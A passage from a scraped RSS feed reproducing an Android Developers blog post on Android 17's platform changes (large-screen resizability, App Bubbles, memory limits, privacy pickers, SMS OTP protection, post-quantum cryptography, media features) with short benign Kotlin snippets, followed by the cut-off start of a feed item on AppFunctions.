<p>To ensure apps deliver a premium experience across all form factors, including mobile devices running in desktop mode on connected displays, Android 17 (API level 37) removes the developer opt-out for orientation and resizability restrictions on <a href="https://developer.android.com/guide/topics/large-screens">large screen devices</a> (sw &gt; 600 dp) for apps targeting API level 37. The system will ignore legacy manifest attributes and runtime APIs, including screenOrientation, setRequestedOrientation(), resizeableActivity=false, and aspect ratio constraints (minAspectRatio/maxAspectRatio). Games (based on <a href="https://support.google.com/googleplay/android-developer/answer/9859673?hl=en">app category</a> in Google Play) remain exempt. Your app must be ready to adapt to any window size, respect the user's preferred device posture, and support free-form windowing natively.</p>

<h2>Next-gen multitasking: App Bubbles, Bubble Bar, and desktop interactive PiP</h2>
<p>Android 17 introduces powerful new windowing capabilities that redefine how users multitask, demanding even greater layout flexibility from your apps:</p>
<ul>
    <li><strong>App Bubbles:</strong> Moving beyond the messaging bubbles API, users can now transform any app into a floating bubble by long-pressing its icon on the launcher. This feature is available across phones, foldables, and tablets, enabling lightweight multitasking for any workflow.</li>
    <li><strong>The Bubble Bar:</strong> On large screens (tablets and foldables), the system taskbar now includes a dedicated Bubble Bar to organize, transition between, and dock these floating app bubbles.</li>
    <li><strong>Desktop interactive PiP:</strong> In desktop environments, Android 17 introduces interactive Picture-in-Picture (PiP). Unlike traditional PiP windows which are read-only, these pinned windows remain fully interactive while staying always-on-top of other application windows.</li>
</ul>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg12FRQ31sUiyMj_ZalamTRI4VyI2tMXYKEoRy6b-u0Het272IDbRhznXot7b8AvFJEX-ubw_-pNxyS5JTKPUTBj1CNXwIYkTE906vembUcHeyGzE4Lb72WRyGNF7dOP_aBssNeCplOjEnKAc3d3hkak81LOpG0g9Hlep0AvC11MjdJ1MkqAp7ViUCu2bw/s1600/Bubbles%20(1).gif"><img border="0" data-original-height="1600" data-original-width="1544" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg12FRQ31sUiyMj_ZalamTRI4VyI2tMXYKEoRy6b-u0Het272IDbRhznXot7b8AvFJEX-ubw_-pNxyS5JTKPUTBj1CNXwIYkTE906vembUcHeyGzE4Lb72WRyGNF7dOP_aBssNeCplOjEnKAc3d3hkak81LOpG0g9Hlep0AvC11MjdJ1MkqAp7ViUCu2bw/s16000/Bubbles%20(1).gif"></a></div><p><i>App Bubbles and Bubble Bar in action</i></p>

<h2>Activity recreation updates</h2>
<p>To prevent disruptive state loss and stutter, Android 17 updates the default behavior for Activity recreation. The system will no longer restart activities by default for typical configuration changes that do not require a full UI redraw (including <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_keyboard">CONFIG_KEYBOARD</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_keyboard_hidden">CONFIG_KEYBOARD_HIDDEN</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_navigation">CONFIG_NAVIGATION</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_touchscreen">CONFIG_TOUCHSCREEN</a>, and <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_color_mode">CONFIG_COLOR_MODE</a>).<br>
Instead, running activities will receive these updates via onConfigurationChanged(), enabling smooth transitions. If your application explicitly relies on a full restart to reload resources for these changes, you must now explicitly opt-in using the new <a href="https://developer.android.com/reference/kotlin/android/R.attr#recreateonconfigchanges">android:recreateOnConfigChanges</a> manifest attribute.</p>

<h2>Continue On</h2>
<p>Android 17 adds Continue On to help users seamlessly transition a task between Android devices. The user sees a suggestion for the most recently opened app from their mobile device in their tablet taskbar, providing a one-tap affordance to launch the app and deep-link where they left off. Continue on can support app-to-web transitions, including falling back to using the web if the app isn't installed.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8K42DCZ0VTYpFhTlEazp9_AthhqYdm786k1NFolZrP7HwXk2QlF7UV1CU7ECK9N-CiHSfSbH_E2_cXwL3zUuesP-shpa1nau5QmVWDOQeErnCMtvZUw_wwAHNewZZ5S3811f0n_FNoX4U9kyptZQONM_eDB1AAHaoFjMFgTCC7G1d0X2iRo1MN8sev0/s1920/Continue%20On.png"><img border="0" data-original-height="1200" data-original-width="1920" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8K42DCZ0VTYpFhTlEazp9_AthhqYdm786k1NFolZrP7HwXk2QlF7UV1CU7ECK9N-CiHSfSbH_E2_cXwL3zUuesP-shpa1nau5QmVWDOQeErnCMtvZUw_wwAHNewZZ5S3811f0n_FNoX4U9kyptZQONM_eDB1AAHaoFjMFgTCC7G1d0X2iRo1MN8sev0/s16000/Continue%20On.png"></a><i>Handoff Suggestion on a Tablet</i></div><p><br></p>

<pre><code>class MyHandoffActivity : Activity() {

    ...

  override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    // Do stuff
    ...
    // Enable handoff
    setHandoffEnabled(true, null)
  }

  // Override and implement onHandoffActivityDataRequested
  override fun onHandoffActivityDataRequested(handoffRequestInfo: HandoffActivityDataRequestInfo) : HandoffActivityData {
    // Create and return handoff data
  }
}</code></pre>

<h2>Go adaptive-first with Jetpack Compose</h2>
<p>To help you adapt your apps to meet the new Android 17 requirements, we've launched the <a href="https://github.com/android/skills/tree/main/jetpack-compose/adaptive">Jetpack Compose adaptive skill</a>. This AI-powered developer workflow helps you implement the best adaptive practices:</p>
<ul>
    <li><strong>Adaptive navigation:</strong> Automatically transition between bottom navigation bars on mobile and edge-anchored navigation rails on large screens using NavigationSuiteScaffold from the Material 3 Adaptive library.</li>
    <li><strong>Multi-pane layouts:</strong> Implement list-detail and supporting pane layouts natively using Navigation 3 Scenes (ListDetailSceneStrategy and SupportingPaneSceneStrategy) instead of fragile fragment transactions.</li>
    <li><strong>FlexBox &amp; Grid APIs:</strong> Utilize Compose 1.11's dynamic layout components to easily adjust row and column spans on the fly, ensuring your content always fills the space beautifully.</li>
    <li><strong>Advanced non-touch input:</strong> Leverage Compose 1.11's enhanced trackpad and mouse support, including native focus rings and new APIs (like TrackpadInjectionScope and performTrackpadInput) to easily test and deliver a true "laptop-class" experience on Googlebooks and Desktop Mode.</li>
    <li><strong>Dynamic window states:</strong> Leverage Compose's reactive state model to seamlessly adapt your UI when the app transitions from full screen to a floating App Bubble or an interactive Desktop PiP window, ensuring a premium experience even at minimal dimensions.</li>
</ul>

<h2>Android is Compose-first</h2>
<p>Compose offers the easiest way to build adaptive apps, and that's just one of the <a href="https://developer.android.com/develop/ui/compose/first#why-compose-first">many reasons</a> we believe that all Android UI should be built with Compose. To that end, <a href="https://developer.android.com/develop/ui/compose/first">Android development is now Compose-first</a>. All new Android APIs, libraries, tools, and developer guidance will be built exclusively for Jetpack Compose. Legacy View components (in the android.widget package) and View-based Jetpack libraries (like Fragments, RecyclerView, and ViewPager) are now in maintenance mode. They will receive only critical bug fixes, and no new features.</p>

<blockquote>
    <p><strong>TIP</strong><br>
    Ready to migrate? Use our AI-driven <a href="https://developer.android.com/develop/ui/compose/migrate/migrate-xml-views-to-jetpack-compose">XML to Compose Migration Skill</a> to automatically analyze your legacy View layouts and convert them into highly-adaptive Compose code.</p>
</blockquote>

<h3>Performance &amp; efficiency</h3>
<p>App performance means a smooth user interface, fast app start times, and efficient multitasking; Android 17 has impactful improvements in all of these areas.</p>

<h2>App memory limits</h2>
<p>Memory usage is one of the silent foundations of overall performance. When a foreground app or service grows unchecked, memory management spikes CPU and battery utilization and eventually leads to the termination of other well-behaved cached apps and background jobs, ultimately forcing slower cold starts and impaired multitasking. </p>

<p>Starting in Android 17, the system will enforce strict app memory limits based on a device's total RAM, abruptly terminating offending processes. New things to help you navigate these tighter requirements:</p>
<ul>
    <li><strong>R8 Optimizer:</strong> The R8 optimizer significantly reduces your app's bytecode memory footprint by shrinking classes, methods, and fields into shorter names, and stripping out unused code and resources. Use R8 in full mode along with the new <a href="https://developer.android.com/topic/performance/app-optimization/r8-configuration-analyzer">R8 configuration analyzer</a> to make sure your app is getting the most from R8.<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQePgjeISaotpA-miDPKel-qgAYtepLjMMBaiKZQqTf_iYRTJurn_iAFdC7utLnKRKAh9OhSjF_D83skA2PPg7xts0ORX7aVxBkoax6b9uEPqTlGiY_sh8Xv7U1pr0h4Nm8FLo-h3IJD8FhTJc-gOtpBwyLCnDBUPRJAuaaBjsIOhvUmTXFSna0ykksak/s2048/R8%20Configuration%20Analyzer.png"><img border="0" data-original-height="397" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQePgjeISaotpA-miDPKel-qgAYtepLjMMBaiKZQqTf_iYRTJurn_iAFdC7utLnKRKAh9OhSjF_D83skA2PPg7xts0ORX7aVxBkoax6b9uEPqTlGiY_sh8Xv7U1pr0h4Nm8FLo-h3IJD8FhTJc-gOtpBwyLCnDBUPRJAuaaBjsIOhvUmTXFSna0ykksak/s16000/R8%20Configuration%20Analyzer.png"></a></div></li></ul><div><span><u><br></u></span></div><div><span><u><br></u></span></div><div><br></div><div><br></div><div>The R8 Configuration Analyzer</div><ul><li><strong>LeakCanary in Android Studio Panda:</strong> The profiler now features native LeakCanary integration as a dedicated task, fully integrated with your IDE and source code.</li>
    <li><strong>ApplicationExitInfo:</strong> If your app is terminated by these limits, getDescription() from ApplicationExitInfo will return "MemoryLimiter:AnonSwap".</li>
    <li><strong>On-Device Anomaly Detection:</strong> Part of ProfilingManager, you can leverage trigger-based profiling using TRIGGER_TYPE_ANOMALY to automatically capture heap dumps when the memory limit is reached.</li>
</ul>

<pre><code>val profilingManager = applicationContext
   .getSystemService(ProfilingManager::class.java)

val triggers = ArrayList&lt;ProfilingTrigger&gt;().apply {
  add(ProfilingTrigger.Builder(
    ProfilingTrigger.TRIGGER_TYPE_ANOMALY).build())
}
profilingManager.addProfilingTriggers(triggers)</code></pre>

<p>And, we're working to surface more in-field memory metrics to you within Google Play Console.</p>

<h2>Generational garbage collection</h2>
<p><a href="https://developer.android.com/about/versions">Android 17</a> introduces more frequent, less resource-intensive young-generation collections to <a href="https://developer.android.com/guide/platform#art">ART</a>'s Concurrent Mark-Compact garbage collector (GC). By separating short-lived objects from stable, long-lived ones, the system runs frequent, lightweight "young-generation" sweeps rather than expensive full-heap scans, drastically reducing CPU usage, power drain, and UI stutter. Our testing has shown significant improvements in GC interference with application threads and a reduction in the maximum memory resident set size (RSS). ART improvements are also available to over a billion devices running Android 12 (API level 31) and higher through Google Play System updates.</p>

<h2>Lock-Free MessageQueue</h2>
<p>For apps targeting SDK 37 or higher, the core <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>android.os.MessageQueue</b></a> now implements a lock-free architecture, significantly reducing missed frames, improving app startup time, and radically improving the performance of busy queues in multithreaded scenarios. Note: This can break apps that use reflection on private <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>MessageQueue</b></a> fields and methods.  The <a href="https://developer.android.com/reference/android/os/TestLooperManager#peekWhen()"><b>peekWhen</b></a> and <b><a href="https://developer.android.com/reference/android/os/TestLooperManager#poll()">poll</a> </b>APIs have been added to <a href="https://developer.android.com/reference/android/os/TestLooperManager"><b>TestLooperManager</b></a> for instrumentation testing without relying on <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>MessageQueue</b></a> internals.</p>

<h2>Static final fields now truly final</h2>
<p>Starting from Android 17, apps targeting SDK 37 or higher won’t be able to modify “static final” fields, allowing the runtime to apply performance optimizations more aggressively. An attempt to do so via reflection (or deep reflection) will lead to an IllegalAccessException being thrown. Modifying them via JNI’s <b><code>SetStatic&lt;Type&gt;Field</code></b> methods family will immediately crash the application.</p>

<h2>Custom notification view restrictions</h2>
<p>To reduce memory usage we are further restricting the size of <a href="https://developer.android.com/develop/ui/views/notifications/custom-notification">custom notification views</a>. This update closes a loophole that allows apps to bypass existing limits using URIs. This behavior is gated by the target SDK version and takes effect for apps targeting API 37 and higher.</p>

<h3>Privacy &amp; Security</h3>
<p>Maintaining user trust is at the heart of the Android ecosystem. Android 17 introduces robust features that protect sensitive data while simplifying user experiences.</p>

<h2>Privacy-preserving choices</h2>
<p>Historically, apps required broad, permanent permissions to access information like contacts, precise location and media files. Android 17 continues the shift toward privacy-preserving choices that grant temporary, session-based access only to the data the user explicitly selects:</p>
<ul>
  <li><strong>System-Level Contact Picker:</strong> Utilizing <code>ACTION_PICK_CONTACTS</code>, apps can request temporary access only to specific fields (e.g., email or phone number) chosen by the user, eliminating the need for the broad <code>READ_CONTACTS</code> permission. It also fully supports work/personal profile separation.</li>
    <li><strong>Customizable Photo Picker aspect ratio:</strong> Using<b><code>PhotoPickerUiCustomizationParams</code></b>, you can customize the system photo picker to show thumbnails in portrait mode. This is perfect for apps that always display photos and videos in portrait such as video based social media apps.</li>
    <li><strong>System-rendered Location Button:</strong> A new system-rendered location button that you can embed in your app grants precise location access for the current session only.</li>
    <li><strong>EyeDropper API:</strong> A new system-level API, <code>ACTION_OPEN_EYE_DROPPER</code>, allows your app to create a system-powered eyedropper enabling the user to select color from any pixel on the display. This provides a secure, privacy-preserving color-picking experience that eliminates the need for broad, sensitive screen capture or media projection permissions.</li>
</ul>

<pre><code>val eyeDropperLauncher = registerForActivityResult(ActivityResultContracts.StartActivityForResult()) { result -&gt;
   if (result.resultCode == Activity.RESULT_OK) {
       val color = result.data?.getIntExtra(Intent.EXTRA_COLOR, Color.BLACK)
       // Use the picked color in your app
   }
}
fun launchColorPicker() {
   val intent = Intent(Intent.ACTION_OPEN_EYE_DROPPER)
   eyeDropperLauncher.launch(intent)
}</code></pre>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8m_oR9WymjE9G26nGUCqdhS9GrBd6FXN3ujWbjq7ECD6OMGhS4xUApWkAWpPpRef7lwLhsRE2jYL9FADoF_FX2eMXD-0hp9JVaCzrDhfU8RYJ9qv-Ds9YIwyQK7yHKidW0oOtX1rpg2pG9x2yNp3UkGJDPqUlHX7hiLb-bvDue67FPZK1O-22SuXbO8I/s1267/Eyedropper%20Tester.webp"><img border="0" data-original-height="713" data-original-width="1267" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8m_oR9WymjE9G26nGUCqdhS9GrBd6FXN3ujWbjq7ECD6OMGhS4xUApWkAWpPpRef7lwLhsRE2jYL9FADoF_FX2eMXD-0hp9JVaCzrDhfU8RYJ9qv-Ds9YIwyQK7yHKidW0oOtX1rpg2pG9x2yNp3UkGJDPqUlHX7hiLb-bvDue67FPZK1O-22SuXbO8I/w640-h360/Eyedropper%20Tester.webp" width="640"></a></div><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><span><span face="Arial, sans-serif"><i>Picking a color from anywhere on the screen with the system EyeDropper</i></span></span></h3><h2>Local network access</h2>
<p>Apps targeting Android 17 now either require the <code><a href="https://developer.android.com/reference/kotlin/android/Manifest.permission#access_local_network">ACCESS_LOCAL_NETWORK</a></code> runtime permission or the use of system-mediated, privacy-preserving device pickers for local network communication, such as talking to smart home devices or casting receivers. Because <code>ACCESS_LOCAL_NETWORK</code>  falls under the existing <code><a href="https://developer.android.com/reference/android/Manifest.permission_group#NEARBY_DEVICES">NEARBY_DEVICES</a></code> permission group, users who have already granted other <code><a href="https://developer.android.com/reference/android/Manifest.permission_group#NEARBY_DEVICES">NEARBY_DEVICES</a></code> permissions will not be prompted again. </p>

<h2>SMS OTP protection</h2>
<p>Android 17 expands SMS one-time-password (OTP) protection by delaying access to SMS messages for three hours:</p>
<ul>
  <li>WebOTP Format: <a href="https://developer.android.com/about/versions/17/behavior-changes-all#sms-otp-all-apps">Delayed for all apps that are not the intended recipient (domain mismatch)</a>.</li>
  <li>Standard SMS OTP: <a href="https://developer.android.com/about/versions/17/behavior-changes-17#sms-otp-protection">Delayed for all apps targeting SDK 37+</a>.</li>
  <li>Exemptions: Default SMS, assistant, and connected companion apps are exempt. Apps are strongly encouraged to migrate to the <a href="https://developer.android.com/identity/sms-retriever">SMS Retriever</a> or <a href="https://developers.google.com/identity/sms-retriever/user-consent/overview">SMS User Consent APIs</a>.</li>
</ul>

<h2>Post-Quantum Cryptography (PQC)</h2>
<p>Android 17 is ready for the next generation of cryptographic security:</p>
<ul>
  <li>Keystore Integration: Supported devices can generate ML-DSA (Module-Lattice-Based Digital Signature Algorithm) keys in secure hardware to produce quantum-safe signatures, exposed via standard JCA APIs.</li>
  <li>Hybrid APK Signing: Introducing the v3.2 APK Signature Scheme, which combines classical signatures with ML-DSA signatures to secure app delivery.</li>
</ul>

<h2>Safer native dynamic code loading </h2>
If your app targets SDK 37 or higher, the Safer Dynamic Code Loading (DCL) protection <a href="https://developer.android.com/about/versions/14/behavior-changes-14#safer-dynamic-code-loading">introduced in Android 14</a> for DEX and JAR files now extends to native libraries. All native files loaded using System.load must be marked as read-only. Otherwise, the system throws UnsatisfiedLinkError

<h2>Smarter password protection for physical inputs</h2>
<p>With Android 17, we're making it safer to enter passwords, PINs, and other secrets when using a physical keyboard by no longer showing the last typed character by default.</p>
<p>Users can still easily customize these display settings to match their preferences (availability may vary by device manufacturer).</p>
<p>These enhanced privacy protections are automatically supported byAndroid's built-in SDK components and will be supported in Compose 1.12 for SecureTextFields. </p>

<h3><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFjWXyRLybiLVAIrIm1_60XHXhPmpB1QEph7AuqsGHs-NihIDRFbUgBh32gUKxo30173W-RpEInX9hmYFVnW5V8ZqtM3n_CzxlT0B0PVQr0LSOuOi7x2kZgN_jHRRlYJ7bYInZllvUGNoA_SrXkNi5wwHvUghUcnl0Gsgx_-ts4QEHq_KdbEYgWCg92xA/s798/Hide%20First%20Letter.gif"><img border="0" data-original-height="449" data-original-width="798" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFjWXyRLybiLVAIrIm1_60XHXhPmpB1QEph7AuqsGHs-NihIDRFbUgBh32gUKxo30173W-RpEInX9hmYFVnW5V8ZqtM3n_CzxlT0B0PVQr0LSOuOi7x2kZgN_jHRRlYJ7bYInZllvUGNoA_SrXkNi5wwHvUghUcnl0Gsgx_-ts4QEHq_KdbEYgWCg92xA/s16000/Hide%20First%20Letter.gif"></a></div></h3><h3><br></h3><h3><br></h3><h3><br></h3><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><i><div><i>Smarter password protection for physical inputs</i></div></i><div><br></div><h2>Media and camera features that empower creators and delight users
</h2><p>Android 17 introduces new <a href="https://blog.google/products-and-platforms/platforms/android/android-17-creator-features/">creator features</a> that give access to pro-quality cameras and media, all while improving the experience for consumers.</p>

<ul>
  <li><a href="https://developer.android.com/media/platform/integrate-eclipsa-video">Eclipsa Video</a>: HDR video standard built upon the <a href="https://github.com/SMPTE/st2094-50">SMPTE ST 2094-50 specification</a> that introduces new metadata to help devices adapt content for their display headroom and ambient light conditions, as well as improve the simultaneous display of standard and HDR content.</li>
  <li>RAW14 image format: New support for the <a href="https://developer.android.com/reference/kotlin/android/graphics/ImageFormat#raw14">RAW14 image format</a> provides a way for your professional camera app to capture the highest level of detail and color depth from compatible camera sensors.</li>
  <li>Vendor-defined camera extensions: Vendor-defined extensions enable hardware partners to define and implement custom camera extension modes, providing access to the best and latest camera features.</li>
  <li>Extended HE-AAC software encoder: A new system-provided Extended HE-AAC software encoder, supports both low and high bitrates using unified speech and audio coding, providing significantly better audio quality for voice messages in low-bandwidth conditions, including support for loudness metadata.</li>
  <li><a href="https://developer.android.com/guide/topics/media/media-formats#video-formats">Versatile Video Coding (H.266)</a>:  Enables OEMs to add codec support by defining the <a href="https://developer.android.com/guide/topics/media/media-formats#video-formats">video/vvc</a> MIME type in <a href="https://developer.android.com/reference/android/media/MediaFormat"><code>MediaFormat</code></a>, adding new VVC profiles in <a href="https://developer.android.com/reference/android/media/MediaCodecInfo"><code>MediaCodecInfo</code></a>, and integrating support into <a href="https://developer.android.com/reference/android/media/MediaExtractor"><code>MediaExtractor</code></a>.</li>
  <li>Camera device type: New APIs that query the underlying device type to identify if a camera is built-in hardware, an external USB webcam, or a virtual camera.</li>
  <li>Constant Quality for Video Recording: <a href="https://developer.android.com/reference/android/media/MediaRecorder#setVideoEncodingQuality(int)"><code>SetVideoEncodingQuality</code></a> in <a href="https://developer.android.com/reference/android/media/MediaRecorder"><code>MediaRecorder</code></a> configures a constant quality (CQ) mode for video encoders to ensure uniform visual fidelity across the entire video.</li>
</ul>

<h2>Better support for hearing aids</h2>
<ul>
  <li>Bluetooth LE Audio hearing aid support: Android now includes a specific device category for Bluetooth Low Energy (BLE) Audio hearing aids with the new <a href="https://developer.android.com/reference/android/media/AudioDeviceInfo#TYPE_BLE_HEARING_AID"><code>AudioDeviceInfo.TYPE_BLE_HEARING_AID</code></a> constant, so your app can distinguish hearing aids from regular headsets to provide a tailored experience for users with assistive listening devices.</li>
  <li>Granular audio routing for hearing aids: Android 17 allows users to independently manage where specific system sounds are played. They can choose to route notifications, ringtones, and alarms to connected hearing aids or the device's built-in speaker, helping to avoid unwanted in-ear interruptions while maintaining a Bluetooth connection for hearing aid management apps.</li>
</ul>

<h2>CameraX and  Media3</h2>
<p><a href="https://developer.android.com/jetpack/androidx/releases/camerax">CameraX</a> and <a href="https://developer.android.com/jetpack/androidx/releases/media3">Media3</a> have been updated for Android 17. They are there to do the heavy lifting, smoothing the rough edges of media development and simplifying building reliable camera capture,  smooth media playback, and creative and complex editing experiences. </p>

<p>We've released an <a href="https://github.com/android/skills/tree/main/camera">agent skill</a> that can migrate legacy Android camera implementations (Camera1 or raw Camera2 APIs) to CameraX.</p>
  
<p>Note: You'll need to update your CameraX version to either 1.5.2 or 1.6.0+ to avoid a crash related to an added dynamic range mode on Android 17 devices.</p>

<h3>Get your apps, libraries, tools, and game engines ready!</h3>
<p>If you develop an Android SDK, library, tool, or game engine, it's critical to prepare any necessary updates now to prevent your downstream app and game developers from being blocked by compatibility issues and allow them to target the latest SDK features. Please let your downstream developers know if updates are needed to fully support Android 17.</p>

<p>Testing involves installing your production app or a test app making use of your library or engine using Google Play or other means onto a device or emulator running Android 17 Beta 4. Work through all your app's flows and look for functional or UI issues. Each release of Android contains platform changes that improve privacy, security, and overall user experience; review the app impacting behavior changes for apps <a href="https://developer.android.com/about/versions/17/behavior-changes-all">running on</a> and <a href="https://developer.android.com/about/versions/17/behavior-changes-17">targeting</a> Android 17 to focus your testing, including the following:</p>
<ul>
  <li>Resizability on large screens: Once you target Android 17 (SDK 37), you can no longer opt out of maintaining orientation, resizability and aspect ratio constraints <a href="https://developer.android.com/about/versions/17/changes/ff-restrictions-ignored">on large screens</a>.</li>
  <li>Dynamic code loading: If your app targets SDK 37 or higher, the Safer Dynamic Code Loading (DCL) protection <a href="https://developer.android.com/about/versions/14/behavior-changes-14#safer-dynamic-code-loading">introduced in Android 14 </a>for DEX and JAR files now extends to native libraries. All native files loaded using System.load() must be marked as read-only. Otherwise, the system throws UnsatisfiedLinkError.</li>
  <li>Enable CT by default: <a href="https://developer.android.com/privacy-and-security/security-config#CertificateTransparencySummary">Certificate transparency (CT)</a> is enabled by default. (On Android 16, CT is available but apps had to <a href="https://developer.android.com/privacy-and-security/security-config#certificateTransparency">opt in</a>.)</li>
  <li>Local network protections: Apps targeting SDK 37 or higher have <a href="https://developer.android.com/privacy-and-security/local-network-permission#android-17-enforcement">local network access blocked by default</a>. Switch to using privacy preserving pickers if possible, and use the new <a href="https://developer.android.com/reference/kotlin/android/Manifest.permission#access_local_network"><b><code>ACCESS_LOCAL_NETWORK</code></b>permission for broad, persistent access.</a></li>
  <li>Background audio hardening: Starting in Android 17, the audio framework enforces <a href="https://developer.android.com/about/versions/17/changes/bg-audio">restrictions on background audio interactions</a> including audio playback, <a href="https://developer.android.com/media/optimize/audio-focus">audio focus</a> requests, and <a href="https://developer.android.com/reference/android/media/AudioManager#adjustStreamVolume(int,%20int,%20int)">volume change</a> APIs. Based on your feedback, we’ve made some changes since beta 2, including targetSDK gating while-in-use FGS enforcement and exempting alarm audio. Full details available in the <a href="https://developer.android.com/about/versions/17/changes/bg-audio">updated guidance</a>.</li>
  <li>NPU access declaration: Apps targeting Android 17 that need to directly access the NPU must declare <a href="https://developer.android.com/reference/kotlin/android/content/pm/PackageManager#feature_neural_processing_unit">FEATURE_NEURAL_PROCESSING_UNIT</a> in their manifest to avoid being blocked from accessing the NPU. This includes apps that use the <a href="https://ai.google.dev/edge/litert/next/npu">LiteRT NPU delegate</a>, vendor-specific SDKs, as well as the deprecated <a href="https://developer.android.com/ndk/guides/neuralnetworks">NNAPI</a>.</li>
</ul>

<h3>Get started with Android 17</h3>
<p>Your Pixel device should get Android 17 shortly if you haven't already been on the Android Beta. If you don’t have a Pixel device, you can <a href="https://developer.android.com/about/versions/17/get#on_emulator">use the 64-bit system images with the Android Emulator</a> in Android Studio. If you are currently on Android 17 Beta 4.1 and have not yet taken an Android 17 QPR1 beta, you can opt out of the program and you will then be offered the release version of Android 17 over the air.</p>
<h3>Getting the Android 17 beta on partner devices</h3>
<p>Android 17 is available in beta on handset, tablet, and foldable form factors <a href="https://developer.android.com/about/versions/17/devices">from partners</a> including Honor, iQOO, Lenovo, OnePlus, OPPO, Realme, Sharp, vivo, and Xiaomi.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy5cwRcpdR2j-1KMzQPpsxvIODRLlVkaFNQEIQoNaPQa4X4rgEna5imminlwFdcSJ3xihXdUSFouOC0-ZKyK1A53cBmoaU03au-FjfsqkPXm0tPLtOaWT_7z8tqnMmQjFOr-YIKeP3BMVq8Hmd7yH0zllW1aFMuiW6AAAcDUVL7aIyCAIZUs0d_0VMdF4/s1653/android-17-beta-partners.jpg"><img border="0" data-original-height="624" data-original-width="1653" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy5cwRcpdR2j-1KMzQPpsxvIODRLlVkaFNQEIQoNaPQa4X4rgEna5imminlwFdcSJ3xihXdUSFouOC0-ZKyK1A53cBmoaU03au-FjfsqkPXm0tPLtOaWT_7z8tqnMmQjFOr-YIKeP3BMVq8Hmd7yH0zllW1aFMuiW6AAAcDUVL7aIyCAIZUs0d_0VMdF4/s16000/android-17-beta-partners.jpg"></a></div><br><h3><br></h3>

<p>For the best development experience with Android 17, we recommend that you use the latest Canary build of <a href="https://developer.android.com/studio/preview">Android Studio Quail</a>. Once you’re set up, here are some of the things you should do:</p>
<p>Test your current app for compatibility, learn whether your app is <a href="https://developer.android.com/about/versions/17/behavior-changes-all">affected by changes in Android 17</a>, and install your app onto a device or <a href="https://developer.android.com/studio/run/emulator">Android Emulator</a> running Android 17 and extensively test it.</p>

<p>Thank you again to everyone who participated in our Android developer preview and beta program. We're looking forward to seeing how your apps take advantage of the updates in Android 17, and have plans to bring you updates in a fast-paced release cadence going forward.</p>
<p>For complete information on Android 17 please visit the <a href="https://developer.android.com/about/versions/17">Android 17 developer site</a>.</p><br><br>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build intelligent Android apps: Integrate into Android's intelligence system using AppFunctions]]></title>
<description><![CDATA[Posted by Ben Weiss, Senior Developer Relations Engineer, Android Developer RelationsWelcome back to the blog post series "Build intelligent Android apps" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our previous post, we explored...]]></description>
<link>https://tsecurity.de/de/3693499/android-tipps/build-intelligent-android-apps-integrate-into-androids-intelligence-system-using-appfunctions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693499/android-tipps/build-intelligent-android-apps-integrate-into-androids-intelligence-system-using-appfunctions/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:27 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi961epgT3N_Za_k2-pCJ30tegn7DM-Umh1LWh7Q4NxhryR5H57JB00zKQcek56ccAvEM95i6wyXWWCZZ7486_Gq1ewxPHtsMY13UVsVTmndAvkOJtHPjUXuZ3XW_yBEFtlOr2ocBFIKr0PCRZhIRs67h6bX6zDKihwcxQs8bGbYTqIp5azuBKcX4PNMMY/s2469/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Meta.png"><p></p><p><i>Posted by Ben Weiss, Senior Developer Relations Engineer, Android Developer Relations</i></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s8583/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png"><img border="0" data-original-height="2601" data-original-width="8583" 